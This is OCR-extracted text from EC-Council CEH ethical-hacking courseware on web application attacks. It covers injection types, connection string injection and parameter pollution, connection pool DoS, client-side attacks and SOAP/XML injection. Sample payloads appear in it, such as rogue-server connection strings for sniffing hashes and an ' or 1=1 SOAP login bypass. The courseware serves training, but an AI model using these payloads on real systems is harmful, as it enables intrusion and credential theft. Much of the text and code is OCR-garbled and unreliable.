S o l i c i t X ID : 0 x 5 a8 2 d f C ID : 000 1000 117e22 aab [T C P se g m e n t o f a r e a s s e m b le d PD U ] x m p p - c l ie n t > q w a v e [ a c k ] s e q - 1 A c k - 3 8 w i n S o l i c i t X ID : 0 x 8 3 e 0 4 9 C I D : 0 0 0 1 0 0 0 1 1 7 e 8 e l4 e w e b m a il- 2 > h t t p [ s y n ] seq = 0 w in= 8 1 9 2 Len= 0 [S Y N , [a c k ]
ack]
24 7 .0 7 6 3 2 4 0 0 1 2 3 .1 0 8 . 4 0 . 3 3 25 7 .0 7 6 6 9 1 0 0 1 0 . 0 . 0 . 5 26 27 28 29 < 1 <1 0060 0070 0080 0090 OOaO OObO OOcO OOdO OOeO OOfO 0 10 0 0 110 0 12 0 0130 0140 3a 65 43 65 54 20 61 6e 54 20 61 2d 2c 65 20 32 U 6t 6c 68 31 74 2e 68 30 63 73 20 2c 70 32 3a 6f 65 75 30 68 63 75 38 68 74 6d 20 72 3a 20 6b 74 2C 3a 3d 61 2c 3a 65 6f 75 70 65 33 41 69 65 20 32 2f 6d 20 35 2d 72 73 6f 2d 34 0 65 64 32 32 3b Od 31 32 43 65 74 73 63 20 bl 3a 3b 32 3a 20 Oa 39 3a 6f 2c 2d 74 68 47 63 20 20 2d 33 64 45 20 30 6e 20 72 2d 65 4d 68 5f 65 53 33 6f 78 4e 30 74 6e 65 63 63 54 bb 6e 78 65 20 6d 70 6f 20 72 6f 76 68 6b 7 .0 7 6 9 0 0 0 0 1 0 .0 .0 .5 7 .1 3 0 4 2 7 0 0 1 2 3 .1 0 8 . 4 0 . 3 3 7 . 1 3 5 7 3 5 0 0 1 2 3 . 1 0 8 .4 0 . 3 3 7 .1 3 6 6 3 5 0 0 1 2 3 .1 0 8 .4 0 . 33
60 h t t p > w e b m a il- 2 60 w e b m a il- 2 > h t t p 1197 60 1514 228
seq = 0 A c k = l w in s e q = l A c k = l w in= 6424! w in = 8 :
G ET / n e w m a i l / m a i l s i g n o u t . php H T T P / 1 .1 h t t p > w e b m a il- 2 [ a c k ] s e q l A c k 1 1 4 4 [ t c p s e g m e n t o f a r e a s s e m b le d p d u ] H T T P / 1 .1 200 OK (te x t/ h tm l)
> HI
II >
:2 2 :3 4 G e r : A p ac cooki e : e le t e d ; T h u , 221 0 :2 2 :3 a th - /; d n .c o m .. E T h u , 19 0 8 :5 2 :0 ach e-co n - s to re , , m u s t- r e , p o stp re - ch e M T .. S e r v h e . . S e tn l 8 u =d e x p ir e s sep- 2 0 1 1 3 GMT; p o m a in - . x p ir e s : N ov 1981 0 GMT. .C t r o l : no no-cache e v a lid a t check = 0 . ck = 0 . . P r Profile: Default
Od Od 31 70 70 47 61 69 76 47 6f 2d 61 65 3d
Oa Oa 38 69 2d 4d 69 72 20 4d 6C 63 6c 63 30
53 53 75 72 32 54 6e 65 31 54 3a 61 69 6b Od
65 65 5f 65 30 3b 3d 73 39 Od 20 63 64 3d Oa
72 /4 3d 73 31 20 2e 3a 38 Oa 6e 68 61 30 50
76 2d 64 3d 31 70 69 20 31 43 6f 65 74 2c 72
File: "E:\CEH-T0 0 ls\CEHv8 Module 08 Sniffers'
Packets: 2266 Displayed: 2266 Marked: 0 Load time: 0:00.254
FIGURE 13.49: Wireshark Tool Screenshot
Module 13 Page 1882
Web App H acking M ethodology

Footprint W eb Infrastructure Analyze W eb Applications Attack Authorization Schemes Perform Injection Attacks
C EH
Attack W eb App Client
Attack W eb Servers
Attack W eb Services

l- H H Injection attacks are very common in web applications. There are many types of injection attacks such as web scripts injection, OS commands injection, SMTP injection, SQL injection, LDAP injection, and XPath injection. Apart from all these injection attacks, a frequently occurring attack is a SQL injection attack. Injection frequently takes place when the data that is given by the user is sent to the interpreter as a part of a command or query. For launching an injection attack, the attacker supplies the crafted data that tricks and makes the interpreter to execute the commands or query that are unintended. Because of the injection flaws, the attacker can easily read, create, update, and remove any of the arbitrary data, i.e., available to the application. In some cases, the attacker can even bypass a deeply nested firewall environment and can take complete control over the application and the underlying system. The detail of each injection attack is given on the following slides.
Module 13 Page 1883
In jectio n A ttacks
J the interpreted language being used in order to break application's normal intended
Urt1fw4
CEH
ilhiul lUthM
In injection attacks, attackers supply crafted malicious input that is syntactically correct according to
Web Scripts Injection
SQL Injection
If user input is used into code that is dynamically executed, enter crafted input that breaks the intended data context and executes commands on the server
Enter a series of malicious SQL queries into input fields to directly manipulate the database
B B
OS Com m ands Injection Exploit operating systems by entering malicious codes in input fields if applications utilize user input in a system-level command
LDAP Injection
Take advantage of non-validated web application input vulnerabilities to pass LDAP filters to obtain direct access to databases
SMTP Injection Inject arbitrary STMP commands into application and SMTP server conversation to generate large volumes of spam email
XPath Injection Enter malicious strings in input fields in order to manipulate the XPath query so that it interferes with the application's logic
Note: For complete coverage of SQL Injection concepts and techniques refer to Module 14: SQL Injection
Copyright by
EC -G auactl. All Rights Reserved. Reproduction is Strictly Prohibited.
Injection Attacks
In injection attacks, attackers supply crafted malicious input that is syntactically correct
according to the interpreted language being used in order to break the application's normally intended input. Q W eb Scripts Injection: If user input is used in code that is dynamically executed, enter crafted input that breaks the intended data context and executes commands on the server OS Commands Injection: Exploit operating systems by entering malicious code in input fields if applications utilize user input in a system-level command SM TP Injection: Inject arbitrary SMTP commands into application and SMTP server conversation to generate large volumes of spam email 0 SQL Injection: Enter a series of malicious SQL queries into input manipulate the database LDAP Injection: Take advantage of non-validated web application input vulnerabilities to pass LDAP filters to obtain direct access to databases XPath Injection: Enter malicious strings in input fields in order to manipulate the XPath query so that it interferes with the application's logic fields to directly
Module 13 Page 1884
Note: For complete coverage of SQL Injection concepts and techniques, refer to Module 14: SQL Injection Attacks.
Module 13 Page 1885
Attack W eb Servers
Attack Web Services
Copyright

^ ^ J Attacking the data connectivity allows the attacker to gain unauthorized control over the information in the database. The various types of data connectivity attacks and their causes as well as consequences are explained in detail on the following slides.
Module 13 Page 1886

CEH
r~
Database connectivity attacks exploit the way applications connect to the database instead of abusing database queries Data Connectivity Attacks
S S
Database connection strings are used to connect applications to database engines

"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd ;"
Example of a common connection string used to connect to a Microsoft SQL Server database
0r r 0r r 0r r 0r r <s= 0T r o
Connection String Injection Connection String Parameter Pollution (CSPP) Attacks Connection Pool DoS
J L
_y v_

^ A
Attackers directly attack data information available in the database.
connectivity so that they Database connectivity
can
access sensitive exploit the way
attacks
applications connect to the database instead of abusing database queries. Data Connectivity Attacks Connection String Injection Connection String Parameter Pollution (CSPP) Attacks Connection Pool DoS
Database connection strings are used to connect applications to database engines:

"D a ta U ser S o u rc e = S e rv e r ,P o r t; ID = U s e r n a m e ; N e tw o rk L ib r a r y = D B M S S O C N ; In it ia l C a ta lo g = D a ta B a s e ; P a s s w o rd = p w d ;"
Example of a common connection string used to connect to a Microsoft SQL Server database
Module 13 Page 1887
Connection String Injection

In a delegated authentication environm ent, th e attacker injects param eters in a connection string by appending them w ith the sem icolon (;) character A connection string injection attack can occur w hen a dynam ic string concatenation is used to build connection strings based on user input
CEH
B efo re Injection " D a t a S o u r c e = S e r v e r , P o r t ; N etw o rk Lib rary= D BM SSO C N ; I n i t i a l U s e r ID = U sernam e; P assw o rd = p w d ;" C a ta lo g = D a t a B a s e ;
A fte r Injection " D a t a S o u r c e = S e r v e r , P o r t ; N e tw o rk Lib rary= D BM SSO C N ; I n i t i a l U s e r ID = U sernam e; Passw ord= pw d; E n c r y p t i o n = o f f " C a ta lo g = D a t a B a s e ;
When the connection string is populated, the of parameters
Encryption value will be added
to the previously configured set
Connection String Injection

^
A connection string injection attack can occur when dynamic string concatenation is used to build connection strings that are based on user input. If the string is not validated and malicious text or characters not escaped, an attacker can potentially access sensitive data or other resources on the server. For example, an attacker could mount an attack by supplying a semicolon and appending an additional value. The connection string is parsed by using a "last one wins" algorithm, and the hostile input is substituted for a legitimate value. The connection string builder classes are designed to eliminate guesswork and protect against syntax errors and security vulnerabilities. They provide methods and properties corresponding to the known key/value pairs permitted by each data provider. Each class maintains a fixed collection of synonyms and can translate from a synonym to the corresponding well-known key name. Checks are performed for valid key/value pairs and an invalid pair throws an exception. In addition, injected values are handled in a safe manner. Before injection The Common connection string gets connected to the Microsoft SQL Server database as shown as follows:
Module 13 Page 1888
"Data S o u r c e = S e r v e r ,P o r t ; N e t w o r k Library=DBMSSOCN; User ID=Username; P a s s w ord=pwd;
Initial C a t a l o g = D a t a B a s e ;
FIGURE 13.50: Before injection
After injection The attackers can easily inject parameters just by joining a semicolon (;) character using connection string injection techniques in a delegated authentication environment. In the following example, the user is asked to give a user name and password for creating a connection string. Here the attacker enters the password as "pwd; Encryption=off"; it means that the attacker has voided the encryption system. The resulting connection string becomes:
"Data Source=Server,P o r t ; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd; Encryption=off "
FIGURE 13.51: After injection
W hen the connection string is populated, the encryption value will be added to the previously configured set of parameters.
Module 13 Page 1889
Connection String Parameter Pollution (CSPP) Attacks
r CII < .! ! 1E !1
Attacker tries to connect to the database by using the Web Application System account instead of a user-provided set of credentials
D a ta s o u r c e - S Q L 2 00 5 ; i n i t i a l c a ta lo g d b l; in t e g r a t e d s e c u r it y n o ; u s e r i d ; D a ta S o u rc e Rogue S e r v e r ; P a s s w o rd ; In te g r a te d S e c u r ity t r u e ; D a ta s o u r c e S Q L 2 00 5 ; i n i t i a l c a t a lo g d b l ; i n t e g r a t e d s e c u r i t y n o ; u s e r i d ; D a ta S o u rc e T a r g e t S e r v e r , T a r g e t P o r t 4 4 3 ; Pas s w o rd ; In te g r a te d S e c u r ity t r u e ; D a ta s o u r c e S Q L 2 0 0 5 ; i n i t i a l c a ta lo g d b l / in t e g r a t e d s e c r u r it y n o ; u s e r i d ; D a ta S o u rc e T a rg e t S e rv e r, T a rg e t P o r t ; P a s s w o rd ; I n t e g r a t e d S e c u r it y t r u e ;
Attacker will then sniff Windows credentials (password hashes) when the application tries to connect to R o g u e _S e rv e rwith the Windows credentials it's running on
Copyright by
Connection String Param eter Pollution (CSPP) Attacks

Connection string parameter pollution (CSPP) is used by attackers to steal user IDs and to hijack web credentials. CSPP exploits specifically the semicolon delimited database connection strings that are constructed dynamically based on the user inputs from web applications. In CSPP attacks, attackers overwrite parameter values in the connection string.
H ash S tealing
. An attacker replaces the value of data source parameter with that of a Rogue Microsoft SQL Server connected to the Internet running a sniffer:
D a ta so u rce = SQ L2005; in it ia l S e rv e r; c a t a lo g P a ssw o rd = d b l; in t e g r a t e d s e c u r ity = n o ; u ser ID = ;D a t a S o u rce = R o g u e In t e g r a t e d S e c u r it y = t r u e ;
Attackers will then sniff Windows credentials (password hashes) when the application tries to connect to Rogue_Server with the Windows credentials it's running on.
P o rt S can n in g
Attacker tries to connect to different ports by changing the value and seeing the error messages obtained.
Module 13 Page 1890
D a ta
so u rce
SQ L2005;
in it ia l S e rv e r,
c a t a lo g T a rg e t
d b l;
in t e g r a t e d
s e c u r ity = n o ;
u ser
ID = ;D a t a
S o u rce = T a rg e t
P o rt= 4 4 3 ;
P a ssw o rd = ;
In t e g r a t e d
S e c u r it y = t r u e ;
H ijack in g W eb C re d e n tia ls
Attacker tries to connect to the database by using the W eb Application System account instead of a user-provided set of credentials.
D a ta so u rce = SQ L2005; in it ia l S e rv e r, c a t a lo g T a rg e t = d b l; in t e g r a t e d s e c u r ity = n o ; u ser ID = ;D a t a S o u rce = T a rg e t P o rt; P a ssw o rd = ; In t e g r a t e d
S e c u r it y = t r u e ;
Module 13 Page 1891
C onnection Pool DoS

Attacker examines the connection pooling settings of the application, constructs a large m alicious SQL query, and runs m ultiple queries sim ultaneously to consum e all connections in the connection pool, causing database queries to fail for legitim ate users
Crt<fW 4
CEH
ItliK4I Km Im(
Ex a m p le: By default in ASP.NET, the maximum allowed connections in the pool is 100 and tim eout is 30 seconds
&
Thus, an attacker can run 100 m ultiple queries w ith 30+ seconds execution tim e w ithin 30 seconds to cause a connection pool DoS such that no one else w ould be able to use th e database-related parts of the application
Copyright by
large malicious SQL query, and runs multiple queries simultaneously to consume all connections in the connection pool, causing database queries to fail for legitimate users. Example: By default, in ASP.NET, the maximum allowed connections in the pool is 100 and timeout is 30 seconds. Thus, an attacker can run 100 multiple queries with 30+ seconds execution time within 30 seconds to cause a connection pool DoS such that no one else would be able to use the database related parts of the application.
Connection Pool DoS

The attacker examines the connection pooling settings of the application, constructs a
Module 13 Page 1892
Web App H acking M ethodology

Footprint W eb Infrastructure Analyze W eb Applications Attack Authorization Schemes Perform Injection Attacks
C EH
(rtifwtf itfciul lUilwt
Attack Web App Client

A ttack W eb App C lient
Attacks performed on a server-side application infect the client-side application when the client-side application interacts with these malicious server or process malicious data. The attack on the client side occurs when the client establishes a connection with the server. If there is no connection between client and server, then there is no risk. This is because no malicious data is passed by the server to the client. Consider an example of a client-side attack where an infected web page targets a specific browser weakness and exploits it successfully. As a result, the malicious server gains unauthorized control over the client system.
Module 13 Page 1893
A ttack Web App C lient

J A ttackers in te ra c t w ith th e server-sid e a p p lica tio n s in u n e x p e cted w a y s in o rd e r to p e rfo rm m alicio u s a ction s a g ain st th e en d u sers and access u n a u th o riz e d d a ta
Redirection Attacks
Frame Injection
Session Fixation
ActiveX Attacks
Cross-Site Scripting
HTTP Header Injection
Request Forgery Attack
Privacy Attacks
Copyright by EC-Council. All Rights Reserved Reproduction isStrictly Prohibited.
Attack Web App C lient

Attackers interact with the server-side applications in unexpected ways in order to perform malicious actions against the end users and access unauthorized data. Attackers use various methods to perform the malicious attacks. The following are the malicious attacks performed by attackers to compromise client-side web applications: Cross-Site Scripting Redirection Attacks HTTP Header Injection Frame Injection Request Forgery Attacks Session Fixation Privacy Attacks ActiveX Attacks
Module 13 Page 1894
An attacker bypasses the clients ID's security mechanism and gains the access privileges, and then injects the malicious scripts into the web pages of a particular website. These malicious scripts can even rewrite the HTML content of the website.
R ed irec tio n A ttacks

I ) f/l
Attackers develop codes and links in such a way that they resemble the main site that the user wants to visit; however, when a user wants to visit the respective site, the user is redirected to the malicious website where there is a possibility for the attacker to obtain the user's credentials and other sensitive information.
t HTTP H ea d er In je c tio n
An attacker splits the HTTP response into multiple responses by injecting a malicious response in HTTP headers. This attack can deface websites, poison the cache, and trigger crosssite scripting.
F ra m e In je c tio n
W hen scripts don't validate their input, codes are injected by the attacker through frames. This affects all the browsers and scripts which doesn't validate untrusted input. These vulnerabilities occur in HTML page with frames. Another reason for this vulnerability is editing of the frames is supported by the web browsers.
R eq u est F o rg ery A ttack

In this attack, the attacker exploits the trust of website or web application on the
user's browser. The attack works by including a link in a page that accesses a site to which the user is authenticated.
Session F ixation
Session fixation helps an attacker to hijack a valid user session. In this attack, the attacker authenticates him or herself with a known session ID and then hijacks the uservalidated session by the knowledge of the used session ID. In a session fixation attack, the attacker tricks the user to access a genuine web server using an existing session ID value.
P riv acy A ttacks

A privacy attack is tracking performed with the help of a remote site that is based on a leaked persistent browser state.
A ctiveX A ttacks
The attacker lures the victim via email or a link that has been crafted in such a way that the loopholes of remote execution code become accessible. Attackers gain equal
access privileges to that of an authorized user.
Module 13 Page 1895
Attack W eb Servers
Attack Web Services
Copyright
Web App Hacking Methodology Attack Web Services

W eb services are easily targeted by the attacker. Serious security breaches are caused when an attacker compromises the web services. The different types of web service attacks and their consequences are explained on the following slides.
Module 13 Page 1896

Hacking W eb A pplications
A tta c k W eb S e r v ic e s
J
CEH
Web services work atop the legacy web applications, and any attackon web service will immediately expose an underlying application's business and logic vulnerabilities for various attacks
Information Leakage, Application Logic Attacks
D a ta b a s e A tta c k s , DoS A tta c k s
Cl
a v a ila b le
rjf
Attack Web Services

W e b se rvice s w o r k a t o p t h e le g a cy w e b a p p lic a tio n s , a n d a n y a t t a c k o n a w e b s e rvice
w i ll i m m e d i a t e l y e x p o s e an u n d e r l y in g a p p l i c a t i o n ' s b u s in e s s a n d lo g ic v u l n e r a b i l i t i e s f o r v a r io u s a tta c k s . W e b se rv ic e s can to u sers th ro u g h v a r io u s be a t t a c k e d u sin g m a n y t e c h n i q u e s as t h e y a re m a d e H e n ce , th e p o s s ib ility o f v u ln e r a b i l it ie s
m e c h a n is m s .
increa se s . T h e a t t a c k e r can e x p l o i t t h o s e v u l n e r a b i l i t i e s t o c o m p r o m i s e t h e w e b se rvices. T h e r e m a y b e m a n y r e a s o n s b e h in d a t t a c k in g w e b se rvices. A c c o r d in g t o t h e p u r p o s e , t h e a t t a c k e r can c h o o s e t h e a t t a c k t o c o m p r o m i s e w e b services. If t h e a t t a c k e r 's i n t e n t i o n is t o s to p a w e b s e rv ic e f r o m s e rv in g i n t e n d e d users, t h e n th e a t t a c k e r can la u n c h a d e n ia l- o f- s e r v ic e a t t a c k by s e n d in g n u m e r o u s r e q u e s ts . V a r io u s t y p e s o f a tta c k s u sed t o a t t a c k w e b se rvice s are: 0 Q SOAP I n je c tio n X M L I n je c tio n W S D L P r o b in g A t ta c k s I n f o r m a t i o n Leakage A p p l i c a t i o n Logic A t ta c k s D a ta b a s e A t ta c k s
M odule 13 Page 1897
Ethical Hacking and C ounterm easures Copyright by
EC-C0UnCil

DoS A t ta c k s
Web Services
SOAP Injection, XML Injection
WSDL Probing Attacks
In fo r m a tio n Lea kage, A p p lic a tio n Logic A tta c k s
Database Attacks, DoS Attacks
FIGURE 13.52: Attack Web Services
EC-C0UnCil

Web S e rv ic e s P ro b in g A ttack s
6 In th e fir s t step, th e a ttacke r tra p s th e WSDL d o c u m e n t fro m w e b service tra ffic and analyzes it to d e te rm in e th e p urp o se o f th e a p p lic a tio n , fu n c tio n a l break d o w n , e n try po in ts , and message types 9 These attacks w o rk s im ila r t o SQL in je c tio n attacks
C EH
(artifwd ilhiul lUtbM
A tta cker th e n creates a s e t o f v alid re q u e s ts by selecting a set o f o p e ra tio n s , and fo rm u la tin g th e request messages a ccording to th e rules o f th e XM L Schema th a t can be s u b m itte d t o th e w e b service A tta c k e r uses th e se requests t o in clude m alicious c o n te n ts in SOAP requests and analyzes errors t o gain a deeper und erstanding o f p o te n tia l s ecurity weaknesses
v.-r: u r .
Attacker
<?xm l verslon"I.O - encoding"UTF S ' standalone' no *? > - <$Q A P -E N V : Envelope )(m ln s: SO A PSO K l"http://www.w3.org/2001/ XM Lschem a' xm lns: S0A PSD K 2http ://www .w3 .org/200 l/XMLSchem .o Inst.once" xm lns: S0A PSD K 3"http://schemas .xm lso.op .org/soap/ encoding/' xm lns: S O A P E N V ' http://schemas .xm lsoap .org/soap/ envelope/'> < S O A P -E N VB o d y -< S O A P S D K4: GetProdUctlnform ationByNam e xm lns: S Q A P S D K 4' http://sfaustlap/Productlnfo/>
[<SQAPSDK4; name? ^SQAP3DK4; na m d
<?>o:m l versions" 1, 0 " encoding" utf-8" ? > - <so ap : Envelope xm lns: soap"http://schem as.xm lsoap.org/soap/ envelope/ xm lns: xsi= "http://www .w 3 .org/2001/XMlSchem -instl'lnce " xm lnv xsd='http://www .w 3 .org/20DI/XMLSchemlT> < soap :B o d y> <soap:Fault> <faultcodc>*oap:Scrvcr</faultcode> <faultstring>System .W eb .S ervices.Protocols.S oapException: t r w m i w t i to
procat raquatt -> tyrtam Oata.ClcUbCleOMcaption Syntax rror (miuing operator) n query n n o r produttr\ane Ilk ' and provlderld '112 111 SMI. At tyttem.Oau.OleOb.OieObcoflimandixeciAeCommandTattrrorHanAng IMU hr) t 0 a.OUDb.O(eDtxcm nd l noarteConim ndteirt or}ingleM et tit ItagOSTAftAMS dbParamt. Ot*0 <t* c.oa/teHourt) I lyitcm Oata.OUOb.OlcOOCOmmand ( 0cute(0mmandTe1 t|(Jt>;cct&eao<ut<*(et 1/ t ) M iyM wnM <*<06 Ct<OKomand taacuteCemmand !Command Behavior behavior. abject* exact*eftemit) at Syttem Oata OteOb OleObCo mm and. liKutdte adc1 nterna !(Command Behavior behavior, String mathoc! at Syftem.Oata.OIDb.OleOt)ccn1mand.lxaa<teKeader|Con1mandBehBv1ar behavior) at iyitem Oata.OleOb.O<eObcommand lisa/teKcader() at Product M. froductOBAeceit . Gat Product M armatlon( String productMame. String uld, String pauword) at Prodjetlnfa.ProduclnfoXietProdualnl or mat ion& *Name( String r\a1 e, String !ad, Stnng password - Ind a t inner exctpoon Hack trac </faultstring>
Server throw s an error
Attacker inject a rb itra ry character (') in the input field
<S 0A P S D K 4: uid>312 111 -8S43</SO APSDK4:uid> <S 0A P S D K 4: passw ord> 5648</SO APSD K 4: passw ord> </S O A P S D K4: G etProduc t Inform a ti 0 nByNam e> </SO A PE N V :B o d y c/SO A PE N V :E nvelope>
<detail /> </soap: Fault> </soap : B ody> </soap: Envelope>
Copyright by EG G o u acil. All Rights Reserved. Reproduction is Strictly Prohibited.
Web Services Probing Attacks

In t h e f i r s t s te p , t h e a t t a c k e r t r a p s t h e W S D L d o c u m e n t f r o m w e b s e rv ic e t r a f f i c a nd a n a lyze s it t o d e t e r m i n e t h e p u r p o s e o f t h e a p p li c a t i o n , f u n c t i o n a l b r e a k d o w n , e n t r y p o in t s , a n d m e s s a g e ty p e s . T h e s e a tta c k s w o r k s im i l a r l y t o SQL i n j e c t i o n a tta c k s . T h e a t t a c k e r t h e n c r e a te s a se t o f v a lid r e q u e s ts by s e le c tin g a se t o f o p e r a t i o n s , a n d f o r m u l a t i n g t h e r e q u e s t m essa ge s a c c o r d in g t o t h e r u le s o f t h e X M L S c h e m a t h a t can be s u b m i t t e d t o t h e w e b se rvice. T h e a t t a c k e r uses th e s e r e q u e s ts t o in c lu d e m a lic io u s c o n t e n t in SO AP r e q u e s ts a n d a na lyze s e r r o r s t o g ain a d e e p e r u n d e r s t a n d in g o f p o t e n t i a l s e c u r it y w e a k n e s s e s .
Attacker
............<
Attacker inject arbitrary character (') in the input field
<?xm l version1.0" encoding'U TF-S ' standalone no' ? > <SO A P *E N V : Envelope )(m lns: SOAPSOK1- http://www.w3.org/2001/ XM Lschem a' xm lns: SO APSDK2="http ://www .w3 .org/200 l/XMLSchem.o- inst.once" xm lns: S O A PSD K 3="http://schemas .xm lso.op .org/soap/ encoding/' xm lns: SO A PENV http://schemas .xm lsoap .org/soap/ envelope/'* - <SO A P- EN V:B ody> - <S0APSDK4: GetProdUctlnform ationByName xm lns: SO A PSD K 4=' 1 ^ : / ^8051^ ^ 0^1 ^<^ 0/ > kS0APSDK4: nam e> </SO APSDK4: namel <S0A PSD K4: uid>312 - 111 - 8543</SO APSDK4: uid> <SO A P$D K 4: password* 5648</SO AP$DK4: pa39w ord> </SOAPSDK4: GetProduct Inform a tiO nBy Nam e> </S0APEN V: B ody> </SOAPE N V : Envelope*
<?>o:m l version"I, O " encoding" utf-8 " 1> <soap: Envelope xm lns: soap=http://schemas.xmlsoap.org/soap/ envelope/" xm lns: xsi="http://www .w3 .org/2001/XMLSchem~- instl'lnce " xm lns: xsd=http://www .w3 .org/200 l/XMLSchm lT> <soap: B ody> <soap:Fault>
<faultcode>soap:Server</faultcode>
<fauhstring>System . Web .Services.Protocols .SoapException:
Server throw s an error
vÂ ûnahi.'-o proceu request 1y5t em.Dale.OleOb.CXeObCxteption: Syntax error (mining operator I in query e x p m m productnamelike and providerid -'312 - 111 8543". At sv(tenvData.CMeDb.QleObcommand.Executc(ommandTextErR>rHandling IInt32 hr)at ystem.Data.OleOto.OleOtxx>mrrand .EKecuteCommandTertFot SintfeReiull ItagDSPARAMSdbParams, Objects execi*eKesuft) at t JJata.CH e Db.QIeObcommand f xecutrCorrmand T rat( Ofaject&si rcu t rRuM)at S*t n .Data DfcrO fc 0teCX>Commiod .ExecuteCommind (Command Behavior behavk>f,0b>e<U1 exeuittfteMlOat System Data .oleoh .OleOlHo mm and. fxecutefteoderi ntc ms1(command Behavior beharior, String met hod) at Sy>ten1 .Data.OleOb.QleObconmandCxecuHradn(( anmandRrfiaviot behavior)at 5y*tero.Data.0<e0b.0leDbu>t1v11andExe1u leRtadufl at Pr oduct Info. ProductDSAusm. Get Product infrxmat ionfstrirg p rodiKtName, * > tri nj uld, St ring pavtword) at P'odiKtlnfc.PrududnhxCetProduidnfuimetianByNain^Stringneme.Stting u>d, String peatweid)End 04 inner exception *Mdttrar- </faultstring>
<dtail /> </soap: Fault> </*osp : B ody> </30jp: Envelope-'
FIGURE 13.53: Web Services Probing Attacks
EC-C0lMCil

Web Service Attacks: SOAP Injection

J J Attacker injects malicious query strings in the user input field to bypass web services authentication mechanisms and access backend databases This attackworks similarly to SQL Injection attacks
0 d )
Q Q
h ttp ://ju g g yb o y.co m /w s/p ro d u cts.a sm x
Server Response
<?xml version"1.0 encoding="utf-8' ?> - <so^>: Envelope xmlns: soap=', http://schemas .xmlsoap.org/soap/envelope/" xmlns: xsi 'http://www .w3 . org/2001/XMLSchemainstance' xmlns: xsd'h t t p ://www . w3 .org/2001/XMLSchema '> - <soap:Body> - <GetProductlnformationByNameResponse xmlns"http://juggyboy/ProductInfo/< < GetProductlnformationByNameResult> <productid> 25 < /product!d> <product Name >Paintingl01</productName > <productQuantity>3</productQuantity> <productPrice> 1500</productPrice> </GetProductlnforma tionByNameRe sult> </Ge tPr oductlnfo rma tionByNameRe sponse> </soap: Body> </soap: Envelope>
A c c o u n t L o g in Usernam e Password f % [o n
1.0 ined B 'U T F -0 ' s ta n d a lo n e '# # " ? > < ? u l T r : 10 a pe g a l a s : S0APSDK1h ttp ://w w w w3 o r 9 /2001/X M L Sch - < S 0 A P - W Er.v! a l B i : S0APS0K2 h ttp : //w w w .w 3 .o r 9 /2 0 0 1 / XMLSchwa - i n s t a n c e a ls : S0APSDK3 h t t p : // c h e a a s . x b 1 :o p . o t f / s o t p / i B e e d i o ( / ' u l a i S0APEKV h ttp :/ / :e h c B : llf / iO ip le n v c lo p c l > - <S0AP-DfV Body> - <2QAPSDX4 G tP io d a c tln f o n m tio n B y N fto e a l a : : 2GAPSDK4 ' h t t p : / / j a 99yb y / ^ sodQ ec^ n ^ / '> <S0APSDK4: naae>% </S0APSDK4 : n a ae > <50APSDK4: u1d> 312 - 111 - 854 3</SQAPSDK4 : m d > <S0APSDK4: p a ssw o rd :* ' Or 1= 1 Or blah = 1</S0APS0K4 : p a s </S0APS0K 4 G e tP ro due t i n f o r nation By one :> C/SQAP-EKV Body> </S0A P- DP/ : E n v elo p e*
19
Web Service Attacks: SOAP Injection

S im p le O b je c t Access P r o to c o l (SOAP) is a l i g h t w e i g h t a n d s im p le X M L -b a s e d p r o t o c o l t h a t is d e s ig n e d t o e x c h a n g e s t r u c t u r e d a n d t y p e i n f o r m a t i o n o n t h e w e b . T h e X M L e n v e lo p e e l e m e n t is a lw a y s t h e r o o t e l e m e n t o f t h e SOAP m e s s a g e in t h e X M L s c h e m a . T h e a t t a c k e r in je c ts m a lic io u s q u e r y s trin g s in t h e u s e r i n p u t fi e ld t o bypa ss w e b se rvice s a u t h e n t i c a t i o n m e c h a n is m s a n d access b a c k e n d d a ta b a s e s . T his a t t a c k w o r k s s im i l a r l y t o SQL in j e c t i o n a tta c k s .
S e rve r Response
G O http://juggyboy.com/ws/products.asmx
Account Login
U s e rn a m e Passw o rd f %
>
ôr 1 1 orb b h SLbni :
<?xml version="l.0" encoding="utf-8' ?> - <soap: Envelope xmlns: soap=' http://schemas .xmlsoap.org/soap/envelope/" xmlns : xsi ='http://www .w3 .org/2001/XMLSchemainstance' xmlns: xsd= http://www . w3 .org/2001/XMLSchema'>
< s o a p :B o d y >
<?x k 1 version- ' 1.0' encoding-
n i n e SOAPSDK2' h t t p : / / w w w . w 3 . o r g / 2 0 0 1 / XMLSchema - i n a t a n c e ' z n l n a : SOAPSDK3' 11t t p : / / i c h e i u s . xm l s o a p . o r g / s o a p / e n c o d i n g / ' r a i n s : SOAPINV 'h t t p : / / * c h e * 1 d s .z ja l8 0 a p . 0 r g / 8 0 a p J e n v e l o p e J r> <S0AP-BN V:B0dy>
-< S 0 A P -B N V :E n velo p ex m ln s : SO A P S D K l-' http://w w w .w 3 .org/2 0 0 l/*M L S ch e1 -< S O A P S D K 4 :O etP ro d t>ctln fo ro tio n B yN n m e
UTr-8' standalone- 'no"?>
- <GetProductInformationByNameResponse xmlns="http://juggyboy/ProductInfo/">
< G e t P r o d u c t I n f o rm a tio n B y N a m e R e s u it>
n l n s : S0APSDK4' h t t p : / / j u g g y b o y / P r o d u c t l n f o / ' > <SOAPSDK4 naae>% </SOAPSDK4: nnm e> <S0A?SBK4: u ld > 3 1 2 - 1 1 1 - 8543</SO A PSD K 4: u l d > <SOAPSDK4: p a ! s * o r d > ' O r 1 * 1 O r b l a h </SOAPSDK4: p a s s a o r d > < / SOAPSDK 4 : c e tP r o d a c t ln f o r m a tio n l 9 y N a m o > </SOAP ENV:B0dy> <J SOAP BNV : E n v o io p o >
<productid> 25 </productid> <product Name >Paintingl01</productName > <productQuantity>3</productQuantity> <productPrice> 1500</productPrice> </GetProductlnformationByNameResult> < /GetProductlnformationByNameResponse>
< /s o a p : Body>
</coap: Envelope>
FIG U RE 13 .5 4 : SOAP Injection
EC-C0l1nCil

Web S ervice Attacks: XML Injection
C EH
Attackers inject XML data and tags into user input fields to manipulate XML schema or populate XML database with bogus entries XML injection can be used to bypass authorization, escalate privileges, and generate web services DoS attacks
Server Side Code

http://juggyboy.com /ws/login.asm x <?xml version1.0" "encoding"ISO-8859-1"?> cusers> <user> <u semame >gandal f</u sername> <password> c3</password> <userid>l01</userid> <ma!l>gandalf 0nuddleear th. ccnK /mail> </user> <user> <u semane >Mark</ user name> <password>123 45</passwo rd> <userid>l02</userid> <mail>gandalf (?middleearth. cotrK/mail> J <user> <us e m ame>jason</usemame> <password>attc)c</password> <userid>105</userid> <mail>jason@juggyboyconK/mail> <ûser> </users>
Submit
